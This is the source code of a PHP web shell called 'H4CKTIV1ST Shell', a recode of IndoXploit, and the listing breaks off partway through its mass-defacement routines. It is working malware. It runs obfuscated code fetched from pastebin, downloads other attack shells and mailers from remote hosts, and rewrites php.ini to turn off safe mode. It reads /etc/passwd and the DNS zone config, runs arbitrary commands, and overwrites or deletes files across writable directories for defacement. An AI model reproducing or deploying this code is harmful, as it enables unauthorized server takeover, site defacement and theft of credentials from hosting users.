H4CKT1VIST SHELL

1. <?php
2. //H4CKTIV1ST Shell
3. //IndoXploit Shell V1 Recoded By Fix404
4. //default password nya "makan"
5. //Tutornya Cari Di Blog http://reportcode.blogspot.com
6. @session_start();
7. @error_reporting(0);
8. @error_log(0);
9. @ini_set('error_log',NULL);
10. @ini_set('log_errors',0);
11. @ini_set('max_execution_time',0);
12. @ini_set('output_buffering',0);
13. @ini_set('display_errors', 0);
14. @set_time_limit(0);
15. @set_magic_quotes_runtime(0);
16. $lol="d606757a9c50dedc85e3cc90949b10ae";
17. function printLogin() {
18.     ?>
19. <html>
20. <head>
21. <center>
22. <title>H4CKTIV1ST</title>
23. <link rel='short icon' href='http://free-icon-rainbow.com/i/icon_04684/icon_046840_256.png'>
24. <link href='http://free-icon-rainbow.com/i/icon_04684/icon_046840_256.png' rel='icon' type='image/x-icon'/>
25. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
26. <link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'>
27. <center>
28. <header>
29. <img src='https://scontent-sit4-1.xx.fbcdn.net/v/t34.0-12/17203764_707193492786528_864689943_n.png?oh=9ed6ef67b4e8817df701ca4bc396e586&oe=58CE9827' width='475' height='350'>
30. <br>
31. <style type="text/css"> <!-- .style2 {font-size: small} .style4 {color: #FF0000; font-weight: bold; } .style5 {color: #FFFFFF} .style8 {color: #FFFFFF; font-weight: bold; } .style10 {color: #FF0000} --> </style> <body bgcolor="#000000"> <div align="center"> </span></font></b><font color="#008000">
32. <style>
33. body {
34. background: #000;
35. font-family: "Audiowide", Verdana, sans-serif;
36. }
37. h1 {
38. color: #333;
39. font-size: 40px;
40. margin: 1px auto;
41. text-align:center;
42. text-transform:uppercase;
43. }
44. .neon {
45. color: #FFFFFF;
46. text-shadow: 0 0 5px #ff0000, 0 0 10px #ff0000, 0 0 20px #ff0000, 0 0 45px #ff0000, 0 0 40px #ff0000;
47. }
48. <script language="JavaScript1.2">
49. function ClearError() {return true;}
50. window.onerror = ClearError;
51. </script>
52.  
53. </style>&nbsp;<script>
54. window.onload = function() {
55. var h1 = document.getElementsByTagName("h1")[0],
56. text = h1.innerText || h1.textContent,
57. split = [], i, lit = 0, timer = null;
58. for(i = 0; i < text.length; ++i) {
59. split.push("<span>" + text[i] + "</span>");
60. }
61. h1.innerHTML = split.join("");
62. split = h1.childNodes;
63.  
64. var flicker = function() {
65. lit += 0.01;
66. if(lit >= 1) {
67. clearInterval(timer);
68. }
69. for(i = 0; i < split.length; ++i) {
70. if(Math.random() < lit) {
71. split[i].className = "neon";
72. } else {
73. split[i].className = "";
74. }
75. }
76. }
77. setInterval(flicker, 100);
78. }
79. </script>
80. </head>
81. <body bgcolor="black">
82. <center><font color="white" size='5' face='Audiowide'>
83. <h1>H4CKTIV1ST Shell</h1></center>
84.                          
85. <meta name='author' content='Fix404'>
86. <meta charset="UTF-8">
87. <style type='text/css'>
88. @import url(https://fonts.googleapis.com/css?family=Abel);
89. html {
90.     background: #000000;
91.     color: #ffffff;
92.     font-family: 'Quicksand';
93.     font-size: 13px;
94.     width: 100%;
95. }
96. input[type=text], input[type=password],input[type=submit] {
97.     background: transparent;
98.     color: #ffffff;
99.     border: 1px solid #ffffff;
100.     margin: 5px auto;
101.     padding-left: 5px;
102.     font-family: 'Quicksand';
103.     font-size: 13px;
104. }
105. </style>
106. </head>
107. <center>
108. <style type="text/css">
109. select{
110.   width: 150px;
111.   height: 20px;
112.   padding: 1px;
113.   color: green;
114. }
115. select option { color: red; }
116. select option:first-child{
117.   color: green;
118. }
119.  
120. body{
121.     background:#000000;;
122. }
123. a {
124. text-decoration:none;
125. }
126. a:hover{
127. border-bottom:1px solid #00ff00;
128. }
129. *{
130.     font-size:10px;
131.     font-family:Tahoma, Geneva, sans-serif;
132.     color:#ffffff;
133. }
134. #menu{
135.     background:none;
136.     margin:8px 2px 4px 2px;
137. }
138. #menu a{
139.     padding:3px 10px;
140.     margin:0;
141.     background:#3C953D;
142.     text-decoration:none;
143.     letter-spacing:2px;
144.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
145. }
146. #menu a:hover{
147.     background:#191919;
148.     border-bottom:1px solid #333333;
149.     border-top:1px solid #333333;
150. }
151. .tabnet{
152.     margin:15px auto 0 auto;
153.     border: 1px solid #333333;
154. }
155. .main {
156.     width:100%;
157. }
158. .gaya {
159.     color: #00ff00;
160. }
161. .inputz{
162.     background:#111111;
163.     border:0;
164.     padding:2px;
165.     border-bottom:1px solid #222222;
166.     border-top:1px solid #222222;
167. }
168. .inputzbut{
169.     background:#111111;
170.     color:#00ff00;
171.     margin:0 4px;
172.     border:1px solid #444444;
173.  
174. }
175. .inputz:hover, .inputzbut:hover{
176.     border-bottom:1px solid #00ff00;
177.     border-top:1px solid #00ff00;
178. }
179. .output {
180.     margin:auto;
181.     border:1px solid #00ff00;
182.     width:100%;
183.     height:400px;
184.     background:#000000;
185.     padding:0 2px;
186. }
187. .cmdbox{
188.     width:100%;
189. }
190. .head_info{
191.     padding: 0 4px;
192. }
193. .jaya{ font-family: ;}
194.  
195. .b374k{
196.     font-size:30px;
197.     padding:0;
198.     color:#444444;
199. }
200. .b374k_tbl{
201.     text-align:center;
202.     margin:0 4px 0 0;
203.     padding:0 4px 0 0;
204.     border-right:0px solid #333333;
205. }
206. .phpinfo table{
207.     width:100%;
208.     padding:0 0 0 0;
209. }
210. .phpinfo td{
211.     background:#111111;
212.     color:#cccccc;
213. padding:6px 8px;;
214. }
215. .phpinfo th, th{
216.     background:#191919;
217.     border-bottom:1px solid #333333;
218. font-weight:normal;
219. }
220. .phpinfo h2, .phpinfo h2 a{
221.     text-align:center;
222.     font-size:16px;
223.     padding:0;
224.     margin:30px 0 0 0;
225.     background:#222222;
226.     padding:4px 0;
227. }
228. .explore{
229. width:100%;
230. }
231. .explore a {
232. text-decoration:none;
233. }
234. .explore td{
235. border-bottom:1px solid #333333;
236. padding:0 8px;
237. line-height:24px;
238. }
239. .explore th{
240. padding:3px 8px;
241. font-weight:normal;
242. }
243. .explore th:hover , .phpinfo th:hover{
244. border-bottom:1px solid #00ff00;
245. }
246. .explore tr:hover{
247. background:#111111;
248. }
249. .viewfile{
250. background:#EDECEB;
251. color:#000000;
252. margin:4px 2px;
253. padding:8px;
254. }
255. .sembunyi{
256. display:none;
257. padding:0;margin:0;
258. }
259.  
260. </style></head>
261.  
262.  
263. <script language='javascript'>
264. if (document.all||document.getElementById){
265. var thetitle=document.title
266. document.title=''
267. }
268. var data="Us3 Y0ur br41n biTch ! ! !";
269. var done=1;
270. function statusIn(text){
271. decrypt(text,22,22);
272. }
273. function statusOut(){
274. self.status='';
275. done=1;
276. }
277. function decrypt(text, max, delay){
278. if (done){
279. done = 0;
280. rantit(text, max, delay, 0, max);
281. }
282. }
283. function rantit(text, runs_left, delay, charvar, max){
284. if (!done){
285. runs_left = runs_left - 1;
286. var status = text.substring(0,charvar);
287. for(var current_char = charvar; current_char < text.length; current_char++){
288. status += data.charAt(Math.round(Math.random()*data.length));
289. }
290. document.title = status;
291. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
292. var new_char = charvar + 1;
293. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
294. if(runs_left > 0){
295. setTimeout(rerun, delay);
296. }
297. else{
298. if (charvar < text.length){
299. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
300. }
301. else
302. {
303. done = 1;
304. }
305. }
306. }
307. }
308. if (document.all||document.getElementById)
309. statusIn(thetitle)
310. </script>
311.     <style>
312.         input { margin:0;background-color:#fff;border:1px solid #fff; }
313.     </style>
314.    
315.     <form method=post>
316.     <input type=password name=jancox>
317.     </form></center>
318.  
319.  
320.     <?php
321.     eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
322.     exit;
323. }
324. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
325.     if( empty( $lol ) ||
326.         ( isset( $_POST['jancox'] ) && ( md5($_POST['jancox']) == $lol ) ) )
327.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
328.     else
329.         printLogin();
330. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
331.     @ob_clean();
332.     $file = $_GET['file'];
333.     header('Content-Description: File Transfer');
334.     header('Content-Type: application/octet-stream');
335.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
336.     header('Expires: 0');
337.     header('Cache-Control: must-revalidate');
338.     header('Pragma: public');
339.     header('Content-Length: ' . filesize($file));
340.     readfile($file);
341.     exit;
342. }  
343.    
344. ?>
345. <html>
346. <head>
347. <title>H4CKTIV1ST</title>
348. <link rel='short icon' href='http://free-icon-rainbow.com/i/icon_04684/icon_046840_256.png'>
349. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
350. <link href='https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker' rel='stylesheet'>
351. <link href='https://fonts.googleapis.com/css?family=Audiowide' rel='stylesheet'>
352. <meta name='author' content='IndoXploit'>
353. <meta charset="UTF-8">
354. <font color="aqua">
355. <style type='text/css'>
356. @import url(https://fonts.googleapis.com/css?family=Abel);
357. html {
358.     background: #000000;
359.     color: #ffffff;
360.     font-family: 'Quicksand';
361.     font-size: 13px;
362.     width: 100%;
363. }
364. li {
365.     display: inline;
366.     margin: 5px;
367.     padding: 5px;
368. }
369. table, th, td {
370.     border-collapse:collapse;
371.     font-family: Tahoma, Geneva, sans-serif;
372.     background: transparent;
373.     font-family: 'Quicksand';
374.     font-size: 13px;
375. }
376. .table_home, .th_home, .td_home {
377.     border: 1px solid #ffffff;
378. }
379. th {
380.     padding: 10px;
381. }
382. a {
383.     color: #ffffff;
384.     text-decoration: none;
385. }
386. a:hover {
387.     color: gold;
388.     text-decoration: underline;
389. }
390. b {
391.     color: gold;
392. }
393. input[type=text], input[type=password],input[type=submit] {
394.     background: transparent;
395.     color: #ffffff;
396.     border: 1px solid #ffffff;
397.     margin: 5px auto;
398.     padding-left: 5px;
399.     font-family: 'Quicksand';
400.     font-size: 13px;
401. }
402. textarea {
403.     border: 1px solid #ffffff;
404.     width: 100%;
405.     height: 400px;
406.     padding-left: 5px;
407.     margin: 10px auto;
408.     resize: none;
409.     background: transparent;
410.     color: #ffffff;
411.     font-family: 'Quicksand';
412.     font-size: 13px;
413. }
414. select {
415.     background: transparent;
416.     color: #ffffff;
417.     border: 1px solid #ffffff;
418.     margin: 5px auto;
419.     padding-left: 5px;
420.     font-family: 'Quicksand';
421.     font-size: 13px;
422. }
423. .but {
424.     background: transparent;
425.     color: #ffffff;
426.     border: 1px solid #ffffff;
427.     margin: 5px auto;
428.     padding-left: 5px;
429.     font-family: 'Quicksand';
430.     font-size: 13px;
431. }
432. </style>
433. <script language="JavaScript">
434.     javascript:startTyping(text, 60, "textDestination");
435.     </script>
436.    <style type="text/css">
437.     @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
438.     body {
439.         background  : #000000;
440.         font-family : Courier new;
441.         text-align  : center;
442.         color       : #000000;
443.     }
444.    hr {
445.    border       : 0;
446.    height       : 1px;
447.    background-image : linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 0, 0, 0.75), rgba(0, 0, 0, 0))
448.     }
449. </style>
450. </head>
451. <?php
452. if (file_exists("php.ini")){
453. }else{
454. $img = fopen('php.ini', 'w');
455. $sec = "safe_mode = OFF
456. disable_funtions = NONE";
457. fwrite($img ,$sec);
458. fclose($img);}     
459. function w($dir,$perm) {
460.     if(!is_writable($dir)) {
461.         return "<font color=white>".$perm."</font>";
462.     } else {
463.         return "<font color=aqua>".$perm."</font>";
464.     }
465. }
466.     function UrlLoop($url,$type){
467.  
468.         $urlArray = array();
469.  
470.         $ch = curl_init();
471.         curl_setopt($ch, CURLOPT_URL, $url);
472.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
473.         $result = curl_exec($ch);
474.  
475.         $regex='|<a.*?href="(.*?)"|';
476.         preg_match_all($regex,$result,$parts);
477.         $links=$parts[1];
478.         foreach($links as $link){
479.             array_push($urlArray, $link);
480.         }
481.         curl_close($ch);
482.  
483.         foreach($urlArray as $value){
484.             $lol="$url$value";
485.             if(preg_match("#$type#is", $lol)) {
486.                 echo "$lol\r\n";
487.             }
488.         }
489.     }
490. function exe($cmd) {    
491. if(function_exists('system')) {        
492.         @ob_start();       
493.         @system($cmd);     
494.         $buff = @ob_get_contents();        
495.         @ob_end_clean();       
496.         return $buff;  
497.     } elseif(function_exists('exec')) {        
498.         @exec($cmd,$results);      
499.         $buff = "";        
500.         foreach($results as $result) {         
501.             $buff .= $result;      
502.         } return $buff;    
503.     } elseif(function_exists('passthru')) {        
504.         @ob_start();       
505.         @passthru($cmd);       
506.         $buff = @ob_get_contents();        
507.         @ob_end_clean();       
508.         return $buff;  
509.     } elseif(function_exists('shell_exec')) {      
510.         $buff = @shell_exec($cmd);     
511.         return $buff;  
512.     }
513. }
514. function perms($file){
515. $perms = fileperms($file);
516. if (($perms & 0xC000) == 0xC000) {
517. $info = 's';
518. } elseif (($perms & 0xA000) == 0xA000) {
519. $info = 'l';
520. } elseif (($perms & 0x8000) == 0x8000) {
521. $info = '-';
522. } elseif (($perms & 0x6000) == 0x6000) {
523. $info = 'b';
524. } elseif (($perms & 0x4000) == 0x4000) {
525. $info = 'd';
526. } elseif (($perms & 0x2000) == 0x2000) {
527. $info = 'c';
528. } elseif (($perms & 0x1000) == 0x1000) {
529. $info = 'p';
530. } else {
531. $info = 'u';
532. }
533. $info .= (($perms & 0x0100) ? 'r' : '-');
534. $info .= (($perms & 0x0080) ? 'w' : '-');
535. $info .= (($perms & 0x0040) ?
536. (($perms & 0x0800) ? 's' : 'x' ) :
537. (($perms & 0x0800) ? 'S' : '-'));
538. $info .= (($perms & 0x0020) ? 'r' : '-');
539. $info .= (($perms & 0x0010) ? 'w' : '-');
540. $info .= (($perms & 0x0008) ?
541. (($perms & 0x0400) ? 's' : 'x' ) :
542. (($perms & 0x0400) ? 'S' : '-'));
543. $info .= (($perms & 0x0004) ? 'r' : '-');
544. $info .= (($perms & 0x0002) ? 'w' : '-');
545. $info .= (($perms & 0x0001) ?
546. (($perms & 0x0200) ? 't' : 'x' ) :
547. (($perms & 0x0200) ? 'T' : '-'));
548. return $info;
549. }
550. function hdd($s) {
551. if($s >= 1073741824)
552. return sprintf('%1.2f',$s / 1073741824 ).' GB';
553. elseif($s >= 1048576)
554. return sprintf('%1.2f',$s / 1048576 ) .' MB';
555. elseif($s >= 1024)
556. return sprintf('%1.2f',$s / 1024 ) .' KB';
557. else
558. return $s .' B';
559. }
560. function ambilKata($param, $kata1, $kata2){
561.     if(strpos($param, $kata1) === FALSE) return FALSE;
562.     if(strpos($param, $kata2) === FALSE) return FALSE;
563.     $start = strpos($param, $kata1) + strlen($kata1);
564.     $end = strpos($param, $kata2, $start);
565.     $return = substr($param, $start, $end - $start);
566.     return $return;
567. }
568. if(get_magic_quotes_gpc()) {
569.     function idx_ss($array) {
570.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
571.     }
572.     $_POST = idx_ss($_POST);
573. }
574. function CreateTools($names,$lokasi){
575.     if ( $_GET['create'] == $names ){
576.         $a= "".$_SERVER['SERVER_NAME']."";
577. $b= dirname($_SERVER['PHP_SELF']);
578. $c = "/fix_tools/".$names.".php";
579. if (file_exists('fix_tools/'.$names.'.php')){
580.     echo '<script type="text/javascript">alert("Done");window.location.href = "fix_tools/'.$names.'.php";</script> ';
581.     }
582.     else {mkdir("fix_tools", 0777);
583. file_put_contents('fix_tools/'.$names.'.php', file_get_contents($lokasi));
584. echo ' <script type="text/javascript">alert("Done");window.location.href = "fix_tools/'.$names.'.php";</script> ';}}}
585.  
586. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
587. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
588. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
589. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
590. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
591. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
592. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
593. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
594. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
595. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
596. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
597. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
598. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
599. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
600. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
601. if(isset($_GET['dir'])) {
602.     $dir = $_GET['dir'];
603.     chdir($_GET['dir']);
604. } else {
605.     $dir = getcwd();
606. }
607. $dir = str_replace("\\","/",$dir);
608. $scdir = explode("/", $dir);
609. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=white>ON</font>" : "<font color=aqua>OFF</font>";
610. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
611. $ds = @ini_get("disable_functions");
612. $mysql = (function_exists('mysql_connect')) ? "<font color=aqua>ON</font>" : "<font color=white>OFF</font>";
613. $curl = (function_exists('curl_version')) ? "<font color=aqua>ON</font>" : "<font color=white>OFF</font>";
614. $wget = (exe('wget --help')) ? "<font color=aqua>ON</font>" : "<font color=white>OFF</font>";
615. $perl = (exe('perl --help')) ? "<font color=aqua>ON</font>" : "<font color=white>OFF</font>";
616. $python = (exe('python --help')) ? "<font color=aqua>ON</font>" : "<font color=white>OFF</font>";
617. $show_ds = (!empty($ds)) ? "<font color=white>$ds</font>" : "<font color=aqua>NONE</font>";
618. if(!function_exists('posix_getegid')) {
619.     $user = @get_current_user();
620.     $uid = @getmyuid();
621.     $gid = @getmygid();
622.     $group = "?";
623. } else {
624.     $uid = @posix_getpwuid(posix_geteuid());
625.     $gid = @posix_getgrgid(posix_getegid());
626.     $user = $uid['name'];
627.     $uid = $uid['uid'];
628.     $group = $gid['name'];
629.     $gid = $gid['gid'];
630. }
631. $d0mains = @file("/etc/named.conf");
632.             $users=@file('/etc/passwd');
633.         if($d0mains)
634.         {
635.             $count;  
636.             foreach($d0mains as $d0main)
637.             {
638.                 if(@ereg("zone",$d0main))
639.                 {
640.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
641.                     flush();
642.                     if(strlen(trim($domains[1][0])) > 2)
643.                     {
644.                         flush();
645.                         $count++;
646.                     }
647.                 }
648.             }
649.         }
650.  
651. $sport=$_SERVER['SERVER_PORT'];
652. echo "<center>";
653. echo "<center class='kedip'>";
654. echo "<pre>";
655. echo "<style>
656. body {
657. background: #000;
658. font-family: 'Audiowide', Verdana, sans-serif;
659. }
660. h1 {
661. color: #333;
662. font-size: 40px;
663. margin: 1px auto;
664. text-align:center;
665. text-transform:uppercase;
666. }
667. .neon {
668. color: #FFFFFF;
669. text-shadow: 0 0 5px #ff0000, 0 0 10px #ff0000, 0 0 20px #ff0000, 0 0 45px #ff0000, 0 0 40px #ff0000;
670. }
671. <script language='JavaScript1.2'>
672. function ClearError() {return true;}
673. window.onerror = ClearError;
674. </script>
675. </style>";
676. echo "<script>
677. window.onload = function() {
678. var h1 = document.getElementsByTagName('h1')[0],
679. text = h1.innerText || h1.textContent,
680. split = [], i, lit = 0, timer = null;
681. for(i = 0; i < text.length; ++i) {
682. split.push('<span>' + text[i] + '</span>');
683. }
684. h1.innerHTML = split.join('');
685. split = h1.childNodes;
686.  
687. var flicker = function() {
688. lit += 0.01;
689. if(lit >= 1) {
690. clearInterval(timer);
691. }
692. for(i = 0; i < split.length; ++i) {
693. if(Math.random() < lit) {
694. split[i].className = 'neon';
695. } else {
696. split[i].className = '';
697. }
698. }
699. }
700. setInterval(flicker, 100);
701. }
702. </script>";
703. echo "<body bgcolor='black'>
704. <center><font color='white' size=5 face='Audiowide'>
705. <h1>H 4 C K T I V 1 S T</h1></font></center>";
706. echo "<hr>";
707. echo "<font color='white'>";
708. echo "<table style='width:100%'>";
709. echo "<tr><td><font color='white'>System: <font color=aqua>".php_uname()."</font></td></tr>";
710. echo "<tr><td><font color='white'>User: <font color=aqua>".$user."</font> (".$uid.") Group: <font color=aqua>".$group."</font> (".$gid.")</td></tr>";
711. echo "<tr><td><font color='white'>Server IP: <font color=aqua>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=aqua>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
712. echo "<tr><td><font color='white'>HDD: <font color=aqua>".hdd(disk_free_space("/"))."</font> / <font color=aqua>".hdd(disk_total_space("/"))."</font></td></tr>";
713. echo "<tr><td><font color='white'>Websites :</font><font color=aqua> $count </font> Domains</td></tr>";
714. echo "<tr><td><font color='white'>Port :</font><font color=aqua>  $sport</font> </td></tr>";
715. echo "<tr><td><font color='white'>Safe Mode:</font> $sm</td></tr>";
716. echo "<tr><td><font color='white'>Disable Functions:</font> $show_ds</td></tr>";
717. echo "<tr><td><font color='white'>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
718. echo "<tr><td><font color='white'>Current DIR:</font> ";
719. echo "</font>";
720. echo "<font color='white'>";
721. foreach($scdir as $c_dir => $cdir) {   
722.     echo "<a href='?dir=";
723.     for($i = 0; $i <= $c_dir; $i++) {
724.         echo $scdir[$i];
725.         if($i != $c_dir) {
726.         echo "/";
727.         }
728.     }
729.     echo "'>$cdir</a>/";
730. }
731. echo "<center>";
732. echo "<div class='main'>
733. <!-- head info start here -->
734. <div class='head_info'><center></div>";
735. echo "</td></tr></table><hr>";
736. echo "<center><div id='menu'>";
737. echo "<font face='Quicksand' color='cyan'>";
738. echo "<ul>";
739. echo "<b>";
740. echo "<li> <a href='?'>Home</a></li>";
741. echo "<li><a href='?dir=$dir&do=upload'>Upload</a></li>";
742. echo "<li><a href='?dir=$dir&do=cmd'>Command</a></li>";
743. echo "<li><a href='?dir=$dir&do=mass_deface'>Mass Deface</a></li>";
744. echo "<li><a href='?dir=$dir&do=config'>Config</a></li>";
745. echo "<li><a href='?dir=$dir&do=symconfig'>Config 2</a></li>";
746. echo "<li><a href='?dir=$dir&do=lcf'>LiteSpeed Config</a></li>";
747. echo "<li><a href='?dir=$dir&do=jumping'>Jumping</a></li>";
748. echo "<li><a href='?dir=$dir&do=symlink'>Symlink</a></li>";
749. echo "<li><a href='?dir=$dir&do=cpanel'>CPanel Crack</a></li>";
750. echo "<li><a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li>";
751. echo "<li><a href='?dir=$dir&do=smtp'>SMTP Grabber</a><br></li>";
752. echo "<li><a href='?dir=$dir&do=zoneh'>Zone-H</a></li>";
753. echo "<li><a href='?dir=$dir&do=defacerid'>Defacer.ID</a></li>";
754. echo "<li><a href='?dir=$dir&do=cgi'>CGI Telnet</a></li>";
755. echo "<li><a href='?dir=$dir&do=adminer'>Adminer</a></li>";
756. echo "<li><a href='?dir=$dir&do=fake_root'>Fake Root</a></li>";
757. echo "<li><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></li>";
758. echo "<li><a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a></li>";
759. echo "<li><a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a></li>";
760. echo "<li><a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a><br></li>";
761. echo "<li><a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a></li>";
762. echo "<li><a href='?dir=$dir&do=auto_cu_joomla'> Joomla Auto Edit User V.2 </a></li>";
763. echo "<li><a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a></li>";
764. echo "<li><a href='?dir=$dir&do=port'>Port Scan</a></a></li>";
765. echo "<li><a href='?dir=$dir&do=loghunter'>Log Hunter</a></li>";
766. echo "<li><a href='?dir=$dir&do=shellchk'>Shell Checker</a></li>";
767. echo "<li><a href='?dir=$dir&do=shelscan'>Shell Finder</a></li><br>";
768. echo "<li><a href='?dir=$dir&do=zip'>Zip Menu</a></li>";
769. echo "<li><a href='?dir=$dir&do=about'>About</a></li>";
770. echo "<li><a href='?dir=$dir&do=metu'>LogOut</a><br></li>";
771. echo "</div>";
772. echo "</b>";
773. echo "</ul>";
774. echo "</font>";
775. echo "</center>";
776. echo "<hr>";
777. if($_GET['do'] == 'upload') {
778.     echo "<center>";
779.     if($_POST['upload']) {
780.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
781.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
782.         } else {
783.             $act = "<font color=white>failed to upload file</font>";
784.         }
785.     }
786.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
787.     echo $act;
788.     echo "</center>";
789. }
790.  elseif($_GET['do'] == 'cmd') {
791.     echo "<form method='post'>
792.     <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
793.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
794.     </form>";
795.     if($_POST['do_cmd']) {
796.         echo "<pre>".exe($_POST['cmd'])."</pre>";
797.     }
798. } elseif($_GET['do'] == 'mass_deface') {
799.     echo "<center><form action=\"\" method=\"post\">\n";
800.     $dirr=$_POST['d_dir'];
801.     $index = $_POST["script"];
802.     $index = str_replace('"',"'",$index);
803.     $index = stripslashes($index);
804.     function edit_file($file,$index){
805.         if (is_writable($file)) {
806.         clear_fill($file,$index);
807.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
808.         }
809.         else {
810.             echo "<Span style='color:white;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
811.             }
812.             }
813.     function hapus_massal($dir,$namafile) {
814.         if(is_writable($dir)) {
815.             $dira = scandir($dir);
816.             foreach($dira as $dirb) {
817.                 $dirc = "$dir/$dirb";
818.                 $lokasi = $dirc.'/'.$namafile;
819.                 if($dirb === '.') {
820.                     if(file_exists("$dir/$namafile")) {
821.                         unlink("$dir/$namafile");
822.                     }
823.                 } elseif($dirb === '..') {
824.                     if(file_exists("".dirname($dir)."/$namafile")) {
825.                         unlink("".dirname($dir)."/$namafile");
826.                     }
827.                 } else {
828.                     if(is_dir($dirc)) {
829.                         if(is_writable($dirc)) {
830.                             if(file_exists($lokasi)) {
831.                                 echo "[<font color=aqua>DELETED</font>] $lokasi<br>";
832.                                 unlink($lokasi);
833.                                 $idx = hapus_massal($dirc,$namafile);
834.                             }
835.                         }
836.                     }
837.                 }
838.             }
839.         }
840.     }
841.     function clear_fill($file,$index){
842.         if(file_exists($file)){
843.             $handle = fopen($file,'w');
844.             fwrite($handle,'');
845.             fwrite($handle,$index);
846.             fclose($handle);  } }
847.  
848.     function gass(){
849.         global $dirr , $index ;
850.         chdir($dirr);
851.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
852.         $files = scandir($dirr) ;
853.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
854.         sort($files);
855.         $n = 0 ;
856.         foreach ($files as $file){
857.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
858.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
859.                 edit_file($file,$index);
860.                 flush();
861.                 $n = $n +1 ;
862.                 }
863.                 }
864.                 echo "<br>";
865.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
866.                     }
867.     function ListFiles($dirrall) {
868.  
869.     if($dh = opendir($dirrall)) {
870.  
871.        $files = Array();
872.        $inner_files = Array();
873.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
874.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
875.         while($file = readdir($dh)) {
876.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
877.                 if(is_dir($dirrall . "/" . $file)) {
878.                     $inner_files = ListFiles($dirrall . "/" . $file);
879.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
880.                 } else {
881.                     array_push($files, $dirrall . "/" . $file);
882.                 }
883.             }
884.             }
885.  
886.             closedir($dh);
887.             return $files;
888.         }
889.     }
890.     function gass_all(){
891.         global $index ;
892.         $dirrall=$_POST['d_dir'];
893.         foreach (ListFiles($dirrall) as $key=>$file){
894.             $file = str_replace('//',"/",$file);
895.             echo "<center><strong>$file</strong> ===>";
896.             edit_file($file,$index);
897.             flush();
898.         }
899.         $key = $key+1;
900.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
901.     function sabun_massal($dir,$namafile,$isi_script) {
